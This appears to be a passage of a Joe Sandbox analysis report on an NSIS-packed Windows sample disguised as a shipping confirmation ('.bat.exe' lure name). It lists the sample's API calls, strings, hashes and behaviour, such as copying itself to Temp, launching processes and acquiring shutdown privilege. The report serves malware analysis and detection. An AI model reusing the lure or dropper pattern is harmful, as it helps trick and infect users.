lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

wsprintfW.USER32 ref: 00403AC4
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
DeleteFileW.KERNEL32(0042C800), ref: 00403B03
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31

Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C

CopyFileW.KERNEL32(C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
ExitProcess.KERNEL32 ref: 00403BB2
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
ExitProcess.KERNEL32 ref: 00403C5C

Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040391D, 00403922, 00403938, 00403944, 00403953, 00403960, 0040396C, 00403974, 00403A62, 00403AE3, 00403B0F, 00403B30, 00403B39
C:\Users\user\Desktop, xrefs: 00403A85
"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 004037BD, 004037C3, 004037D8, 004039B6
user32::EnumWindows(i r1 ,i 0), xrefs: 00403A72
1033, xrefs: 00403989
Low, xrefs: 0040395B
~nsu%X.tmp, xrefs: 00403ABB
C:\Users\user\eftermodnendes\ringeagt, xrefs: 0040390D, 00403A2F, 00403A7C, 00403A8A
NSIS Error, xrefs: 004037A8
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040365C
Error launching installer, xrefs: 00403A10
UXTHEME, xrefs: 00403733, 00403738, 0040373E
TMP, xrefs: 00403975
SeShutdownPrivilege, xrefs: 00403BEB
TEMP, xrefs: 0040396D
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00403A3A
C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, xrefs: 00403B42
\Temp, xrefs: 0040393F

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
API String ID: 1813718867-3695584748
Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405DB7
lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405DFF
lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405E22
lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405E28
FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405E38
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
FindClose.KERNEL32(00000000), ref: 00405EE7

Strings

\*.*, xrefs: 00405DF9
"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 00405D97
POB, xrefs: 00405DE7

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$POB$\*.*
API String ID: 2035342205-1340378847
Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45

Function 004069DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,00425F98,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
FindClose.KERNEL32(00000000), ref: 004069F6

Strings

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 004069DF

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
API String ID: 2295610775-247911329
Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00008001), ref: 00403DD5
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
GetFileAttributesW.KERNEL32(Call), ref: 00403E73
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

RegisterClassW.USER32(00428A00), ref: 00403EF9
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
ShowWindow.USER32(00000005,00000000), ref: 00403F7C
GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
RegisterClassW.USER32(00428A00), ref: 00403FBE
DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403D59
"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 00403D57
1033, xrefs: 00403D74, 00403DD0
.DEFAULT\Control Panel\International, xrefs: 00403DC0
RichEd32, xrefs: 00403F90
H/B, xrefs: 00403D80
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00403DE4, 00403DEC, 00403E8F, 00403E95, 00403EA5
Control Panel\Desktop\ResourceLocale, xrefs: 00403D88
.exe, xrefs: 00403E62
Call, xrefs: 00403E1C, 00403E25, 00403E33, 00403E82, 00403E88
RichEd20, xrefs: 00403F82
_Nb, xrefs: 00403ED8, 00403F40
RichEdit, xrefs: 00403FAF
RichEdit20W, xrefs: 00403FA0, 00403FA6

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-849894130
Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

Function 004030D5 Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030E9
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,00000400), ref: 00403105

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198

GetFileSize.KERNEL32(00000000,00000000,Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 0040314E
GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
soft, xrefs: 004031C3
Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, xrefs: 00403142
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 004030DE
Null, xrefs: 004031CC
Inst, xrefs: 004031BA
O, xrefs: 00403318
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
Error launching installer, xrefs: 00403125
C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$O
API String ID: 2803837635-576556797
Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

Function 004066BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 004068B8
Call, xrefs: 004066EC, 004067A6, 004067AD, 004067B1, 004067CA, 004067CB, 004067E0, 004067F6, 00406827, 00406853, 00406888, 0040688E, 004068AB, 004068BE, 004068DC, 004068E2, 004068EB, 00406920
Software\Microsoft\Windows\CurrentVersion, xrefs: 004067B2
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406883

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
API String ID: 4024019347-3319343437
Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt,?,?,00000031), ref: 004017DA

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Strings

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 00401826, 00401844
C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll, xrefs: 0040183A, 00401856
Call, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\eftermodnendes\ringeagt, xrefs: 004017A3

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
